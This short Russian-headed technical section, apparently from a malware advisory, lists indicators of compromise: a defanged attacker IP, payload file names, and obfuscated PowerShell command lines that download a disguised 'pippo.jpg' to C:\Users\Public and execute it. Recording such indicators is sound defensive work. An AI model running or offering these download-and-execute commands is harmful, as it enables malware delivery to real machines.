Техническая информация
- http://17#.20.10.2/payload.ps1
- http://17#.20.10.2/pippo.jpg as c:\users\public\pippo.jpg
- '17#.20.10.2':80
- '%WINDIR%\syswow64\cmd.exe' /c PoWeRsHeLl -wIn 1 -C (nEw-ObJeCt NeT.WebClIeNt).dOwNlOaDfIlE('http://17#.20.10.2/PIPPO.jpg', 'C:\Users\Public\PIPPO.jpg') & pOwErShElL -wIn 1 -c C:\Users\Public\PIPPO.jpg & pOwErShElL -wIn 1...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -wIn 1 -c C:\Users\Public\PIPPO.jpg